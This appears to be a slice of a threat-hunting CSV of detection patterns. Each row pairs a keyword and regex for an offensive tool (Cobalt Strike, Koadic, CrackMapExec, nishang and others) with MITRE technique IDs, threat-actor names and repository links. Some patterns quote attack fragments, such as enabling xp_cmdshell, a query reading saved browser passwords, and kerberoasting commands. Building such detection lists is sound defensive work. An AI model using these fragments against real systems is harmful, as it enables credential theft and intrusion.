"*ExecCmdImplant*",".{0,1000}ExecCmdImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43448"
"*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43449"
"*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43450"
"*--exec-method smbexec*",".{0,1000}\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43451"
"*execmethod*PowerPick*",".{0,1000}execmethod.{0,1000}PowerPick.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","43452"
"*execmethod*PowerShell*",".{0,1000}execmethod.{0,1000}PowerShell.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","43453"
"*execPayloads.txt*",".{0,1000}execPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","43454"
"*exec-sc-rand.ps1*",".{0,1000}exec\-sc\-rand\.ps1.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","43455"
"*ExecStartPre present! ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","43456"
"*Executable_Files-main.zip*",".{0,1000}Executable_Files\-main\.zip.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","43457"
"*Execute command without file backdoor*",".{0,1000}Execute\scommand\swithout\sfile\sbackdoor.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","43458"
"*execute PowerShell without powershell.exe*",".{0,1000}execute\sPowerShell\swithout\spowershell\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43459"
"*Execute('SELECT origin_url,username_value,password_value,length(password_value*",".{0,1000}Execute\(\'SELECT\sorigin_url,username_value,password_value,length\(password_value.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","43460"
"*EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;'*",".{0,1000}EXECUTE\(\'sp_configure\s\'\'xp_cmdshell\'\',1\;reconfigure\;\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","43461"
"*execute/host/spawnproc_explorer*",".{0,1000}execute\/host\/spawnproc_explorer.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43462"
"*execute_assembly SharpCloud*",".{0,1000}execute_assembly\sSharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","0","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","43463"
"*execute_bof *",".{0,1000}execute_bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","43464"
"*execute_dotnet_assembly.*",".{0,1000}execute_dotnet_assembly\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43465"
"*execute_embed_docm(*",".{0,1000}execute_embed_docm\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","43466"
"*execute_payload(priv_esc*",".{0,1000}execute_payload\(priv_esc.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","43467"
"*execute_pe -PE*",".{0,1000}execute_pe\s\-PE.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","43468"
"*execute_Pezor*",".{0,1000}execute_Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","43469"
"*execute_shellcode *",".{0,1000}execute_shellcode\s.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","43470"
"*Execute-ACLight.bat*",".{0,1000}Execute\-ACLight\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","43471"
"*Execute-ACLight2.bat*",".{0,1000}Execute\-ACLight2\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","43472"
"*execute-assembly *",".{0,1000}execute\-assembly\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43473"
"*execute-assembly *.exe *",".{0,1000}execute\-assembly\s.{0,15}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","43474"
"*execute-assembly *.exe /ldap:all /filter:sysvol*netlogon*ipc$*print$*",".{0,1000}execute\-assembly\s.{0,100}\.exe\s\/ldap\:all\s\/filter\:sysvol.{0,1000}netlogon.{0,1000}ipc\$.{0,1000}print\$.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","43475"
"*execute-assembly *asreproast*",".{0,1000}execute\-assembly\s.{0,100}asreproast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43476"
"*execute-assembly *kerberoast*",".{0,1000}execute\-assembly\s.{0,100}kerberoast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43477"
"*execute-assembly -c EnableAllTokenPrivs.EnableAllTokenPrivs *",".{0,1000}execute\-assembly\s\-c\sEnableAllTokenPrivs\.EnableAllTokenPrivs\s.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","43478"
"*execute-assembly SharpBlock*",".{0,1000}execute\-assembly\sSharpBlock.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","43479"
"*execute-assembly svchost *.exe*",".{0,1000}execute\-assembly\ssvchost\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43480"
"*execute-assembly*Seatbelt*",".{0,1000}execute\-assembly.{0,1000}Seatbelt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43481"
"*execute-assembly*sharpcookiemonster*",".{0,1000}execute\-assembly.{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","43482"
"*execute-assembly*sigflip*",".{0,1000}execute\-assembly.{0,1000}sigflip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","43483"
"*executeAssembly.nim*",".{0,1000}executeAssembly\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43484"
"*execute-assembly.py*",".{0,1000}execute\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","43485"
"*Execute-Command-MSSQL*",".{0,1000}Execute\-Command\-MSSQL.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43486"
"*Execute-DNSTXT-Code*",".{0,1000}Execute\-DNSTXT\-Code.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43487"
